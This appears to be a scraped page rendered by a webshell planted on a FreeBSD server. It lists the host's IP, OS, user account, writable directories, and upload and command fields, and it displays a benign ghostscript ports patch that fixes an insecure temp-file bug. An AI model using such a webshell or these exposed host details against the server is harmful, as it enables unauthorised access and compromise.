403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/print/ghostscript7-base/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/print/ghostscript7-base/files/patch-lib_ps2epsi.CAN-2004-0967
--- lib/ps2epsi.orig	Mon Nov 28 02:17:38 2005
+++ lib/ps2epsi	Mon Nov 28 02:17:45 2005
@@ -1,7 +1,8 @@
 #!/bin/sh
 # $Id: ps2epsi,v 1.7.2.1 2002/04/22 20:18:24 giles Exp $
 
-tmpfile=/tmp/ps2epsi$$
+tmpfile=`mktemp -t ps2epsi.XXXXXX || exit 1`
+trap "rm -rf $tmpfile" 0 1 2 3 7 13 15
 
 export outfile
 

Youez - 2016 - github.com/yon3zu
LinuXploit